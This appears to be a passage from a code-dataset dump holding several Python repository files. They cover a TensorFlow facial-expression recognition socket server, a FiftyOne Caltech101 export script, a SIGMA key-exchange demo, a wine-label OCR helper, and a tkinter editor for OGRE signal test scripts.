2 * rows + 1\n N = 2 * cols + 1\n sigma = 10\n (X, Y) = np.meshgrid(np.linspace(0, N - 1, N), np.linspace(0, M - 1, M))\n Xc = np.ceil(N / 2)\n Yc = np.ceil(M / 2)\n gaussianNumerator = (X - Xc) ** 2 + (Y - Yc) ** 2\n\n LPF = np.exp(-gaussianNumerator / (2 * sigma * sigma))\n HPF = 1 - LPF\n\n LPF_shift = np.fft.ifftshift(LPF.copy())\n HPF_shift = np.fft.ifftshift(HPF.copy())\n\n img_FFT = np.fft.fft2(imgLog.copy(), (M, N))\n img_LF = np.real(np.fft.ifft2(img_FFT.copy() * LPF_shift, (M, N)))\n img_HF = np.real(np.fft.ifft2(img_FFT.copy() * HPF_shift, (M, N)))\n\n gamma1 = 0.3\n gamma2 = 1.5\n img_adjusting = gamma1*img_LF[0:rows, 0:cols] + gamma2*img_HF[0:rows, 0:cols]\n\n img_exp = np.expm1(img_adjusting)\n img_exp = (img_exp - np.min(img_exp)) / (np.max(img_exp) - np.min(img_exp))\n img_out = np.array(255 * img_exp, dtype=\"uint8\")\n\n return img_out\n\ndef init_weights(shape, name):\n return tf.Variable(tf.random_normal(shape, stddev=0.01), name = name)\n\ndef batch_norm(x, n_out):\n with tf.variable_scope('bn'):\n beta = tf.Variable(tf.zeros([n_out]),\n name='beta', trainable=True)\n gamma = tf.Variable(tf.ones([n_out]),\n name='gamma', trainable=True)\n\n batch_mean, batch_var = tf.nn.moments(x, [0,1,2], name='moments')\n\n ema = tf.train.ExponentialMovingAverage(decay=0.5)\n\n def mean_var_with_update():\n ema_apply_op = ema.apply([batch_mean, batch_var])\n with tf.control_dependencies([ema_apply_op]):\n return tf.identity(batch_mean), tf.identity(batch_var)\n\n mean, var = tf.cond(tf.less(tf.constant(5), tf.constant(2)), mean_var_with_update,\n lambda:(ema.average(batch_mean), ema.average(batch_var)))\n normed = tf.nn.batch_normalization(x, mean, var, beta, gamma, 1e-3)\n return normed\n\ndef model(X, w1a, w1b, w2a, w2b, w3a, w3b, w3c, w3d, w4a, w4b, w4c, w4d, w5a, w5b, w5c, w5d, w6a, w6b, w_o):\n conv1a = tf.nn.conv2d(X, w1a, strides=[1, 1, 1, 1], padding='SAME') # conv1 shape=(?, widtdh, height, kernels) // 224,224, 64\n conv1a_bn = batch_norm(conv1a, 64)\n conv1a_out = tf.nn.relu(conv1a_bn)\n conv1b = tf.nn.conv2d(conv1a_out, w1b, strides=[1, 1, 1, 1], padding='SAME')\n conv1b_bn = batch_norm(conv1b, 64)\n conv1b_out = tf.nn.relu(conv1b_bn)\n pool1 = tf.nn.max_pool(conv1b_out, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') # pool1 shape=(?, width, height, kernels) // 112, 112, 64\n\n\n conv2a = tf.nn.conv2d(pool1, w2a, strides=[1, 1, 1, 1], padding='SAME') # 112,112,128\n conv2a_bn = batch_norm(conv2a, 128)\n conv2a_out = tf.nn.relu(conv2a_bn)\n conv2b = tf.nn.conv2d(conv2a_out, w2b, strides=[1, 1, 1, 1], padding='SAME') # 112,112,128\n conv2b_bn = batch_norm(conv2b, 128)\n conv2b_out = tf.nn.relu(conv2b_bn)\n pool2 = tf.nn.max_pool(conv2b_out, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') #56,56,128\n\n conv3a = tf.nn.conv2d(pool2, w3a, strides=[1, 1, 1, 1], padding='SAME') # 56,56,256\n conv3a_bn = batch_norm(conv3a, 256)\n conv3a_out = tf.nn.relu(conv3a_bn)\n conv3b = tf.nn.conv2d(conv3a_out, w3b, strides=[1, 1, 1, 1], padding='SAME')\n conv3b_bn = batch_norm(conv3b, 256)\n conv3b_out = tf.nn.relu(conv3b_bn)\n conv3c = tf.nn.conv2d(conv3b_out, w3c, strides=[1, 1, 1, 1], padding='SAME')\n conv3c_bn = batch_norm(conv3c, 256)\n conv3c_out = tf.nn.relu(conv3c_bn)\n conv3d = tf.nn.conv2d(conv3c_out, w3d, strides=[1, 1, 1, 1], padding='SAME')\n conv3d_bn = batch_norm(conv3d, 256)\n conv3d_out = tf.nn.relu(conv3d_bn)\n pool3 = tf.nn.max_pool(conv3d_out, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') # 28,28,256\n\n conv4a = tf.nn.conv2d(pool3, w4a, strides=[1, 1, 1, 1], padding='SAME') #28,28,512\n conv4a_bn = batch_norm(conv4a, 512)\n conv4a_out = tf.nn.relu(conv4a_bn)\n conv4b = tf.nn.conv2d(conv4a_out, w4b, strides=[1, 1, 1, 1], padding='SAME')\n conv4b_bn = batch_norm(conv4b, 512)\n conv4b_out = tf.nn.relu(conv4b_bn)\n conv4c = tf.nn.conv2d(conv4b_out, w4c, strides=[1, 1, 1, 1], padding='SAME')\n conv4c_bn = batch_norm(conv4c, 512)\n conv4c_out = tf.nn.relu(conv4c_bn)\n conv4d = tf.nn.conv2d(conv4c_out, w4d, strides=[1, 1, 1, 1], padding='SAME')\n conv4d_bn = batch_norm(conv4d, 512)\n conv4d_out = tf.nn.relu(conv4d_bn)\n pool4 = tf.nn.max_pool(conv4d_out, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') #14,14,512.\n\n conv5a = tf.nn.conv2d(pool4, w5a, strides=[1, 1, 1, 1], padding='SAME') # 14,14,512\n conv5a_bn = batch_norm(conv5a, 512)\n conv5a_out = tf.nn.relu(conv5a_bn)\n conv5b = tf.nn.conv2d(conv5a_out, w5b, strides=[1, 1, 1, 1], padding='SAME')\n conv5b_bn = batch_norm(conv5b, 512)\n conv5b_out = tf.nn.relu(conv5b_bn)\n conv5c = tf.nn.conv2d(conv5b_out, w5c, strides=[1, 1, 1, 1], padding='SAME')\n conv5c_bn = batch_norm(conv5c, 512)\n conv5c_out = tf.nn.relu(conv5c_bn)\n conv5d = tf.nn.conv2d(conv5c_out, w5d, strides=[1, 1, 1, 1], padding='SAME')\n conv5d_bn = batch_norm(conv5d, 512)\n conv5d_out = tf.nn.relu(conv5d_bn)\n pool5 = tf.nn.max_pool(conv5d_out, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') #7,7,512\n\n########### Dense Layer\n dense1 = tf.nn.conv2d(pool5, w6a, strides=[1, 1, 1, 1], padding='VALID') # 1, 1, 4096\n dense1_bn = batch_norm(dense1, 4096)\n dense1_out = tf.nn.relu(dense1_bn)\n\n dense2 = tf.nn.conv2d(dense1_out, w6b, strides=[1, 1, 1, 1], padding='SAME') # 1, 1, 4096\n dense2_bn = batch_norm(dense2, 4096)\n dense2_out = tf.nn.relu(dense2_bn)\n\n dense3 = tf.nn.conv2d(dense2_out, w_o, strides=[1, 1, 1, 1], padding='SAME') # 1, 1, 4\n dense3_bn = batch_norm(dense3, FLAGS.NoC)\n dense3_out = tf.nn.relu(dense3_bn)\n # print(dense1_out.get_shape().as_list())\n pyx = tf.reshape(dense3_out, [-1, FLAGS.NoC])\n\n return pyx\n\n### set tensors\nX = tf.placeholder(\"float\", [None, 224, 224, 1], name='X')\nY = tf.placeholder(\"float\", [None, FLAGS.NoC], name='Y')\n\nw1a = init_weights([3, 3, 1, 64], 'w1a') # 3x3x3 conv, 64 outputs\nw1b = init_weights([3, 3, 64, 64], 'w1b')\nw2a = init_weights([3, 3, 64, 128], 'w2a')\nw2b = init_weights([3, 3, 128, 128], 'w2b')\nw3a = init_weights([3, 3, 128, 256], 'w3a')\nw3b = init_weights([3, 3, 256, 256], 'w3n')\nw3c = init_weights([3, 3, 256, 256], 'w3c')\nw3d = init_weights([3, 3, 256, 256], 'w3d')\nw4a = init_weights([3, 3, 256, 512], 'w4a')\nw4b = init_weights([3, 3, 512, 512], 'w4b')\nw4c = init_weights([3, 3, 512, 512], 'w4c')\nw4d = init_weights([3, 3, 512, 512], 'w4d')\nw5a = init_weights([3, 3, 512, 512], 'w5a')\nw5b = init_weights([3, 3, 512, 512], 'w5b')\nw5c = init_weights([3, 3, 512, 512], 'w5c')\nw5d = init_weights([3, 3, 512, 512], 'w5d')\nw6a = init_weights([7, 7, 512, 4096], 'w6a')\nw6b = init_weights([1, 1, 4096, 4096], 'w6b')\nw_o = init_weights([1, 1, 4096, FLAGS.NoC], 'w_o')\n\npy_x = model(X, w1a, w1b, w2a, w2b, w3a, w3b, w3c, w3d,\n w4a, w4b, w4c, w4d, w5a, w5b, w5c, w5d, w6a, w6b, w_o)\n\npredict_op = tf.argmax(py_x, 1)\n\nsaver = tf.train.Saver()\n\nwith tf.Session() as sess :\n saver.restore(sess, FLAGS.root + FLAGS.ckpt)\n print('model restored')\n\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n\n i=0\n while connection_list:\n\n try:\n print('[INFO] Waiting Request...')\n\n # get request by select, release blocking step by 10 seconds\n read_socket, write_socket, error_socket = select(connection_list, [], [], 10)\n\n for sock in read_socket:\n # new connection\n if sock == serverSocket:\n clientSocket, addr_info = serverSocket.accept()\n connection_list.append(clientSocket)\n\n print('[INFO][%s] new client(%s) is connected.' % (ctime(), addr_info[0]))\n\n # response to client\n for socket_in_list in connection_list:\n if socket_in_list != serverSocket and socket_in_list != sock:\n try:\n f = open(FLAGS.root+'Test/abc%d.jpg'%i, 'wb')\n print('start receiving data...')\n except Exception as e:\n print('error1')\n socket_in_list.close()\n connection_list.remove(socket_in_list)\n\n # getting new data from connected client\n else:\n\n image = sock.recv(BUFSIZE + 1)\n if image:\n print('[INFO][%s] Receive data from client.' % ctime())\n print ('data_size :', len(image))\n\n if image[-2:] == 'aa' :\n f.write(image[:-6])\n f.close()\n print(\"start prediction\")\n im = cv2.imread(FLAGS.root + 'Test/abc%d.jpg'%i, 0)\n # cv2.imshow(\"tmp\", im)\n homed = hom(im)\n blurred = cv2.GaussianBlur(homed, (3, 3), 0)\n eq = cv2.equalizeHist(blurred)\n a = eq.reshape(-1, 224, 224, 1)\n result = sess.run(predict_op, feed_dict={X: a})\n if result[0] == 0:\n exp = 'Anger'\n\n elif result[0] == 1:\n exp = 'Happy'\n elif result[0] == 2:\n exp = 'Neutral'\n else:\n exp = 'Sadness'\n print('[test_decision : ', exp, ']')\n print('send signal')\n socket_in_list.send(exp.encode())\n else:\n f.write(image)\n print('receiving data.....')\n\n else:\n i += 1\n connection_list.remove(sock)\n sock.close()\n print('[INFO][%s] connect is closed.' % ctime())\n # os.remove(svPath + 'abc.jpg')\n except KeyboardInterrupt:\n # exit smoothly\n serverSocket.close()\n sys.exit()\n\n coord.request_stop()\n coord.join(threads)","repo_name":"moon920110/Facial_Expression_Recognition","sub_path":"Embedded_Facial_server.py","file_name":"Embedded_Facial_server.py","file_ext":"py","file_size_in_byte":11826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"72115059346","text":"# This export works, need to filter by top labels\n\n# Training this dataset with Teachable Machine works fine, but I'm not too\n# happy with the categories.\n\n# Art media dataset works fine, but might need some prunning -- lots of pictures\n#Same for WikiArt\n\nimport fiftyone as fo\nimport fiftyone.zoo as foz\nfrom fiftyone import ViewField as F\n\ndataset = foz.load_zoo_dataset(\"caltech101\", max_samples=1000, shuffle=True)\n\nexport_dir = \"caltech101_dataset/\"\nlabel_field = \"ground_truth\" # for example\n\nview = dataset.filter_labels(\"ground_truth\", (F(\"label\") == \"Motorbikes\") | \n (F(\"label\") == \"airplanes\") |\n (F(\"label\") == \"Faces\") |\n (F(\"label\") == \"butterfly\") |\n (F(\"label\") == \"sunflower\"))\n\n# view = dataset.filter_labels(\"ground_truth\", (F(\"label\") == \"Motorbikes\") | \n# (F(\"label\") == \"airplanes\") |\n# (F(\"label\") == \"Faces\") |\n# (F(\"label\") == \"watch\") |\n# (F(\"label\") == \"Leopards\") |\n# (F(\"label\") == \"chandelier\") |\n# (F(\"label\") == \"butterfly\") |\n# (F(\"label\") == \"sunflower\") |\n# (F(\"label\") == \"kangaroo\") |\n# (F(\"label\") == \"laptop\") |\n# (F(\"label\") == \"BACKGROUND_Google\"))\n\n# Export the dataset\nview.export(\n export_dir=export_dir,\n dataset_type=fo.types.ImageClassificationDirectoryTree,\n label_field=label_field\n)","repo_name":"tiagosousagarcia/jumpstart-tutorials","sub_path":"prep-image-categorization/export_dataset_caltech.py","file_name":"export_dataset_caltech.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8133783688","text":"from Party import *\n\n# Instancjowanie obiektów klasy Party jako partie A i B o podanych tożsamościach\nA=Party()\nB=Party()\n\n# KROK 1 = A wysyła do B\nB.opponent_dh_exponential = A.dh_exponential # Swój klucz DH publiczny\n\n# KROK 2 = B wysyła do A\nA.opponent_dh_exponential = B.dh_exponential # B wysyła do A swój klucz DH publiczny\n\nA.opponent_identity = B.identity # B wysyła do A swoją tożsamość (surową)\n\nB.generateSignChallenge() # B wygeneruje dla A wyzwanie - podpis kluczy publicznych DH\nA.opponent_sign_challenge = B.sign_challenge # B wyśle do A wyzwanie podpisowe\n\n# WYLICZENIE KLUCZY WSPÓŁDZIELONYCH\nA.generateSharedKey() # Ponieważ obie strony mają klucze publiczne DH przeciwnika i swoje prywatne\nB.generateSharedKey() # wygenerują na podstawie nich klucz wspólny\n\nB.generateIdentityMAC() # B wyliczy MAC swojej tożsamości z klucza współdzielonego\nA.generateIdentityMAC() # A wyliczy MAC swojej tożsamości z klucza współdzielonego (nie jest potrzebne jeszcze w tym kroku)\nA.opponent_identity_mac = B.identity_mac # B wyśle do A wyliczony MAC z tożsamości\n\n# KROK 3 = A wysyła do B\nB.opponent_identity = A.identity # A wysyła do B swoją tożsamość (surową)\n\nA.generateSignChallenge() # A wygeneruje dla B wyzwanie - podpis kluczy publicznych DH\nB.opponent_sign_challenge = A.sign_challenge # A wyśle do B wyzwanie podpisowe\n\nB.opponent_identity_mac = A.identity_mac # A wysyła do B wyliczony MAC ze swojej tożsamości\n\n# WERYFIKACJE ZGODNOŚCI\nprint(\"Zgodność podpisu od B:\\t\\t\\t\\t\",A.verifySignChallenge(A.opponent_identity)) # A zweryfikuje podpis od B\nprint(\"Zgodność MAC wygenerowanego w A z tym od B:\\t\", A.verifyOpposingMAC()) # A sam wyliczy MAC i zweryfikuje z odebranym\nprint(\"Zgodność podpisu od A:\\t\\t\\t\\t\",B.verifySignChallenge(B.opponent_identity)) # B zweryfikuje podpis od A\nprint(\"Zgodność MAC wygenerowanego w B z tym od A:\\t\", B.verifyOpposingMAC()) # B sam wyliczy MAC i zweryfikuje z odebranym\nprint(\"Zgodność współdzielonych kluczy:\\t\\t\",A.shared_key==B.shared_key) # Zostnie sprawdzona ostatecznie równość wyliczonych kluczy współdzielonych\nprint(\"Jeżeli wszystkie weryfikacje przebiegły pomyślnie - klucz współdzielony jest prawidłowy\")\n# Jeżeli wszystkie linijki będą true, transmisja w protokole SIGMA się powiodła","repo_name":"itsbudyn/krypto-projekt","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18378460453","text":"import json\nimport cv2\nimport os\nimport time\nimport tesserocr\nfrom tesserocr import PyTessBaseAPI\n\ndef new_recognition(images):\n\n for image in images:\n # Check is json already exists\n index = image.find('.')\n jsonfile = image[:index] + '_NEW.json'\n exists = os.path.isfile(jsonfile)\n if not exists:\n # Call text_detection.py and return coordinates found in boxes.json\n call = 'python opencv-text-detection\\\\text_detection.py --image ' + image + ' --east opencv-text-detection\\\\frozen_east_text_detection.pb'\n os.system(call)\n\n # Extract coordinates from boxes.json\n startX, startY, endX, endY = [], [], [], []\n boxesfile = image[:index] + '_BOXES.json'\n with open(boxesfile, 'r') as file:\n data = json.load(file)\n for box in data['boxes']:\n startX.append(box['startX'])\n startY.append(box['startY'])\n endX.append(box['endX'])\n endY.append(box['endY'])\n\n # Find the biggest box\n newStartX = min(startX)\n newStartY = min(startY)\n newEndX = max(endX)\n newEndY = max(endY)\n\n # Crop image given box\n img = cv2.imread(image)\n crop_img = img[newStartY:newEndY, newStartX:newEndX]\n crop_image = image[:index] + '_CROPPED.jpg'\n cv2.imwrite(crop_image, crop_img)\n\n # Send box to tesserocr\n #print(tesserocr.tesseract_version())\n #print(tesserocr.get_languages())\n with tesserocr.PyTessBaseAPI(path='C:\\\\Users\\\\ale19\\\\AppData\\\\Local\\\\Tesseract-OCR\\\\tessdata') as api:\n api.SetImageFile(image)\n text = api.GetUTF8Text()\n\n # Save words found in image_name.json\n words = text.split()\n data = {}\n data['words'] = []\n if not words:\n data['words'].append(' ')\n for word in words:\n data['words'].append(word)\n with open(jsonfile, 'w') as file:\n json.dump(data, file, sort_keys = True, indent = 4)\n\n # Remove cropped image from folder\n time.sleep(1)\n os.remove(crop_image)\n\n print('Recogniton ended for {}\\n'.format(image))\n","repo_name":"alessiabodini/WineBottlesRecognition","sub_path":"new_recognition.py","file_name":"new_recognition.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"28882749055","text":"#! /usr/bin/env python3.0\n\"\"\"\neditor.py - OGRE Script Editor.\n\nDescription:\n The is an interactive tool for building test script snippets. \n\nUsage:\n editor.py [<signal_file> ...]\n\n\"\"\"\nimport copy\nimport imp\nimport os.path\nimport sys\nimport tkinter\nimport tkinter.font\nfrom tkinter.filedialog import askopenfilename\nfrom tkinter.filedialog import asksaveasfilename\n\nimport ogre\n\n\nBG_COLOR = \"lightsteelblue\"\nFIELD_COLOR = \"lightblue\"\nFRAME_COLOR = \"lightsteelblue\"\nBUTTON_COLOR = \"lightblue\"\nHEADER_COLOR = \"steelblue\"\n\nSTICKY_ALL = tkinter.N + tkinter.S + tkinter.W + tkinter.E\n\n# ----------------------------------------------------------------\nclass Int:\n \"\"\"\n Represents an integer in a signal.\n \"\"\"\n def __init__(self, parent, name, obj, i):\n self.name = name\n self.obj = obj\n\n self.value_entry = tkinter.Entry(parent, bg=FIELD_COLOR)\n self.value_entry.insert(0, obj)\n self.value_entry.grid(row=i, column=1, sticky=tkinter.W)\n\n def value(self):\n val = int(self.value_entry.get())\n self.obj = val\n return val\n\n def as_string(self, prefix):\n val = int(self.value_entry.get())\n if val != self.obj:\n return \"%s = %d\\n\" % (prefix, self.value())\n return \"\"\n \n def as_verify_string(self, prefix):\n return \"assert(%s == %d)\\n\" % (prefix, self.value())\n\n\n# ----------------------------------------------------------------\nclass Array:\n \"\"\"\n Represents an array in a signal.\n \"\"\"\n def __init__(self, parent, name, array, i):\n self.name = name\n self.array = array\n self.tree = []\n\n frame = tkinter.Frame(parent, relief=tkinter.GROOVE, bd=2, bg=FRAME_COLOR)\n frame.grid(row=i, column=1, sticky=tkinter.W)\n\n length = len(array)\n for k in range(length):\n attr_name = \"[%d]\" % k\n attr = array[k]\n\n value_label = tkinter.Label(frame, bg=FRAME_COLOR,\n text=\"%d:\" % k)\n value_label.grid(row=k, column=0, sticky=tkinter.E)\n if isinstance(attr, ogre.Struct):\n item = Struct(frame, attr_name, attr, k)\n else:\n item = Int(frame, attr_name, attr, k)\n self.tree.append(item)\n\n def value(self):\n for k, item in enumerate(self.tree):\n self.array[k] = item.value()\n return self.array\n\n def as_string(self, prefix):\n s = \"\"\n for item in self.tree:\n s = s + item.as_string(prefix + item.name)\n return s\n\n def as_verify_string(self, prefix):\n s = \"\"\n for item in self.tree:\n s = s + item.as_verify_string(prefix + item.name)\n return s\n\n# ----------------------------------------------------------------\nclass Struct:\n \"\"\"\n Represents a struct in a signal.\n \"\"\"\n def __init__(self, parent, name, struct, i):\n self.name = name\n self.struct = struct\n self.tree = []\n\n frame = tkinter.Frame(parent, relief=tkinter.GROOVE, bd=2, bg=FRAME_COLOR)\n frame.grid(row=i, column=1, sticky=tkinter.W)\n\n j = 0\n for attr_name in struct.attributes():\n if attr_name == \"sigNo\":\n continue\n attr = getattr(struct, attr_name)\n\n value_label = tkinter.Label(frame, text=attr_name + \":\", bg=FRAME_COLOR)\n value_label.grid(row=j, column=0, sticky=tkinter.E)\n\n if isinstance(attr, ogre.Struct):\n item = Struct(frame, attr_name, attr, j)\n elif isinstance(attr, ogre.Array):\n item = Array(frame, attr_name, attr, j)\n elif isinstance(attr, int):\n item = Int(frame, attr_name, attr, j)\n else:\n print('leaf', j)\n self.tree.append(item)\n j = j + 1\n\n def value(self):\n for item in self.tree:\n setattr(self.struct, item.name, item.value())\n return self.struct\n\n def as_string(self, prefix):\n s = \"\"\n for item in self.tree:\n s = s + item.as_string(prefix + \".\" + item.name)\n return s\n\n def as_verify_string(self, prefix):\n s = \"\"\n for item in self.tree:\n s = s + item.as_verify_string(prefix + \".\" + item.name)\n return s\n\n\n# ----------------------------------------------------------------\nclass HeaderFrame(tkinter.Frame):\n \"\"\"\n Title frame\n \"\"\"\n def __init__(self, parent, title):\n tkinter.Frame.__init__(self, parent, bg=HEADER_COLOR)\n self.pack(fill=tkinter.X)\n myfont = tkinter.font.Font(family=\"Helvetica\", size=12, weight='bold')\n label = tkinter.Label(self, text=title, bg=HEADER_COLOR,\n fg=\"white\", font=myfont)\n label.pack(padx=2, pady=2)\n\n\n# ----------------------------------------------------------------\nclass SignalListFrame(tkinter.Frame):\n \"\"\"\n Signal list frame.\n \"\"\"\n def __init__(self, app, parent):\n tkinter.Frame.__init__(self, parent, bg=BG_COLOR,\n relief=tkinter.RAISED, bd=2)\n self.app = app\n\n HeaderFrame(self, \"Signals\")\n\n # Content frame\n content = tkinter.Frame(self, bg=FRAME_COLOR, relief=tkinter.SUNKEN, bd=1)\n content.pack(fill=tkinter.BOTH, expand=1)\n content.grid_rowconfigure(0, weight=1)\n content.grid_columnconfigure(0, weight=1)\n\n # Scroll bar\n sby = tkinter.Scrollbar(content)\n sby.grid(row=0, column=1, sticky=tkinter.N + tkinter.S)\n\n # List frame\n self.list_frame = tkinter.Listbox(content, \n yscrollcommand=sby.set,\n bg=FIELD_COLOR, width=40, bd=0)\n self.list_frame.grid(row=0, column=0, sticky=tkinter.N + tkinter.S + tkinter.W + tkinter.E)\n self.list_frame.bind(\"<Double-Button-1>\", self.do_double_click)\n sby.config(command=self.list_frame.yview)\n\n # Button frame\n button_frame = tkinter.Frame(self, bg=FRAME_COLOR)\n button_frame.pack(fill=tkinter.X)\n open_button = tkinter.Button(button_frame, text=\"Open\",\n bg=BUTTON_COLOR,\n command=self.app.do_open)\n open_button.pack(padx=4, pady=4)\n\n def do_double_click(self, e):\n for index in self.list_frame.curselection():\n self.app.do_open_send_signal(int(index))\n\n def add(self, sig_name):\n self.list_frame.insert(tkinter.END, sig_name)\n\n\n# ----------------------------------------------------------------\nclass ReceiveFrame(tkinter.Frame):\n \"\"\"\n Received signals frame.\n \"\"\"\n def __init__(self, app, parent):\n tkinter.Frame.__init__(self, parent, bg=BG_COLOR,\n relief=tkinter.RAISED, bd=2)\n self.app = app\n\n HeaderFrame(self, \"Receive\")\n\n # Content frame\n content = tkinter.Frame(self, bg=FRAME_COLOR, relief=tkinter.SUNKEN, bd=1)\n content.pack(fill=tkinter.BOTH, expand=1)\n content.grid_rowconfigure(0, weight=1)\n content.grid_columnconfigure(0, weight=1)\n\n # Scroll bar\n sby = tkinter.Scrollbar(content)\n sby.grid(row=0, column=1, sticky=tkinter.N + tkinter.S)\n\n # List frame\n self.list_frame = tkinter.Listbox(content,\n yscrollcommand=sby.set,\n bg=FIELD_COLOR, width=40, bd=0)\n self.list_frame.grid(row=0, column=0, sticky=tkinter.N + tkinter.S + tkinter.W + tkinter.E)\n self.list_frame.bind(\"<Double-Button-1>\", self.do_double_click)\n sby.config(command=self.list_frame.yview)\n\n # Button frame\n button_frame = tkinter.Frame(self, bg=FRAME_COLOR)\n button_frame.pack(fill=tkinter.X)\n receive_button = tkinter.Button(button_frame, text=\"Receive\",\n bg=BUTTON_COLOR,\n command=self.app.do_receive)\n receive_button.pack(padx=4, pady=4)\n\n def do_double_click(self, e):\n for index in self.list_frame.curselection():\n self.app.do_open_rec_signal(int(index))\n\n def add(self, sig, var):\n signal = \"%s: %s.%s\" % (var, sig.__class__.__module__, sig.__class__.__name__)\n self.list_frame.insert(tkinter.END, signal)\n\n# ----------------------------------------------------------------\nclass LogFrame(tkinter.Frame):\n \"\"\"\n Script window\n \"\"\"\n def __init__(self, app, parent):\n tkinter.Frame.__init__(self, parent, bg=BG_COLOR,\n relief=tkinter.RAISED, bd=2)\n self.app = app\n\n HeaderFrame(self, \"Script\")\n\n # Content frame\n content = tkinter.Frame(self, bg=FRAME_COLOR, relief=tkinter.SUNKEN, bd=1)\n content.pack(fill=tkinter.BOTH, expand=1)\n content.grid_rowconfigure(0, weight=1)\n content.grid_columnconfigure(0, weight=1)\n\n # Scroll bar\n sby = tkinter.Scrollbar(content)\n sby.grid(row=0, column=1, sticky=tkinter.N + tkinter.S)\n sbx = tkinter.Scrollbar(content, orient=tkinter.HORIZONTAL)\n sbx.grid(row=1, column=0, sticky=tkinter.W + tkinter.E)\n\n # List frame\n self.log_frame = tkinter.Text(content, wrap=tkinter.NONE,\n yscrollcommand=sby.set,\n xscrollcommand=sbx.set,\n bg=FIELD_COLOR, width=40, bd=0)\n self.log_frame.grid(row=0, column=0, sticky=tkinter.N + tkinter.S + tkinter.W + tkinter.E)\n sby.config(command=self.log_frame.yview)\n sbx.config(command=self.log_frame.xview)\n\n # Button frame\n button_frame = tkinter.Frame(self, bg=FRAME_COLOR)\n button_frame.pack(fill=tkinter.X)\n save_button = tkinter.Button(button_frame, text=\"Save\",\n bg=BUTTON_COLOR,\n command=self.app.do_save_script)\n save_button.pack(padx=4, pady=4)\n\n def get_log(self):\n return self.log_frame.get(1.0, tkinter.END)\n \n def log_string(self, s):\n self.log_frame.insert(tkinter.END, s + \"\\n\")\n\n def log_connect(self, url, proc):\n s = \"\\n\"\n s += \"url = '%s'\\n\" % url\n s += \"proc = ogre.Process(url, '%s')\\n\" % (proc)\n self.log_frame.insert(tkinter.END, s)\n\n def log_disconnect(self):\n s = \"\\n\"\n s += \"proc.close()\\n\"\n self.log_frame.insert(tkinter.END, s)\n\n def log_import(self, mod):\n s = \"\\n\"\n s += \"import %s\\n\" % (mod)\n self.log_frame.insert(tkinter.END, s)\n\n def log_send(self, sig, tree):\n s = \"\\n\"\n s += \"%s = %s.%s()\\n\" % (tree.name, \n sig.__class__.__module__,\n sig.__class__.__name__)\n s += tree.as_string(tree.name)\n s += \"proc.send(%s)\\n\" % tree.name\n self.log_frame.insert(tkinter.END, s)\n\n def log_receive(self, var):\n s = \"\\n\"\n s += \"%s = proc.receive()\\n\" % (var)\n self.log_frame.insert(tkinter.END, s)\n\n def log_verify(self, sig, tree):\n s = \"\\n\"\n s += tree.as_verify_string(tree.name)\n self.log_frame.insert(tkinter.END, s)\n\n\n# ----------------------------------------------------------------\nclass ConnectionFrame(tkinter.Frame):\n \"\"\"\n Connection frame.\n \"\"\"\n def __init__(self, app, parent):\n tkinter.Frame.__init__(self, parent, bg=BG_COLOR,\n relief=tkinter.RAISED, bd=2)\n self.app = app\n\n HeaderFrame(self, \"Connection\")\n\n # Login frame\n login_frame = tkinter.Frame(self, bg=FRAME_COLOR)\n login_frame.pack(fill=tkinter.BOTH)\n\n url_label = tkinter.Label(login_frame, bg=FRAME_COLOR, text=\"URL:\")\n url_label.grid(row=0, column=0, sticky=tkinter.E, padx=4, pady=4)\n\n self.url_entry = tkinter.Entry(login_frame, bg=FIELD_COLOR, width=32)\n self.url_entry.insert(0, \"tcp://172.17.226.207:22001\")\n self.url_entry.grid(row=0, column=1, sticky=tkinter.W, padx=4, pady=4)\n\n proc_label = tkinter.Label(login_frame, bg=FRAME_COLOR, text=\"Process:\")\n proc_label.grid(row=1, column=0, sticky=tkinter.E, padx=4, pady=4)\n\n self.proc_entry = tkinter.Entry(login_frame, bg=FIELD_COLOR)\n self.proc_entry.insert(0, \"ogre_echo\")\n self.proc_entry.grid(row=1, column=1, sticky=tkinter.W, padx=4, pady=4)\n\n # Button frame\n button_frame = tkinter.Frame(self, bg=FRAME_COLOR)\n button_frame.pack(fill=tkinter.X)\n connect_button = tkinter.Button(button_frame, text=\"Connect\",\n bg=BUTTON_COLOR,\n command=self.do_connect)\n connect_button.pack(padx=4, pady=4, side=tkinter.LEFT)\n disconn_button = tkinter.Button(button_frame, text=\"Disconnect\",\n bg=BUTTON_COLOR,\n command=self.app.do_disconnect)\n disconn_button.pack(padx=4, pady=4, side=tkinter.LEFT)\n quit_button = tkinter.Button(button_frame, text=\"Quit\",\n bg=BUTTON_COLOR,\n command=self.quit)\n quit_button.pack(padx=4, pady=4, side=tkinter.LEFT)\n\n def do_connect(self):\n url = self.url_entry.get()\n proc = self.proc_entry.get()\n self.app.do_connect(url, proc)\n\n\n# ----------------------------------------------------------------\nclass SignalFrame(tkinter.Frame):\n \"\"\"\n Signal frame.\n \"\"\"\n def __init__(self, app, parent, sig, var, rx=False):\n tkinter.Frame.__init__(self, parent, bg=BG_COLOR,\n relief=tkinter.RAISED, bd=2)\n self.app = app\n self.sig = sig\n self.parent = parent\n parent.protocol(\"WM_DELETE_WINDOW\", self.do_close)\n\n HeaderFrame(self, sig.__class__.__name__)\n\n # Sig frame\n sig_frame = tkinter.Frame(self, bg=FRAME_COLOR)\n sig_frame.pack(fill=tkinter.BOTH, expand=1)\n self.tree = Struct(sig_frame, var, sig, 0)\n\n # Button frame\n button_frame = tkinter.Frame(self, bg=FRAME_COLOR)\n button_frame.pack(fill=tkinter.X)\n\n if rx:\n verify_button = tkinter.Button(button_frame, text=\"Verify\",\n bg=BUTTON_COLOR,\n 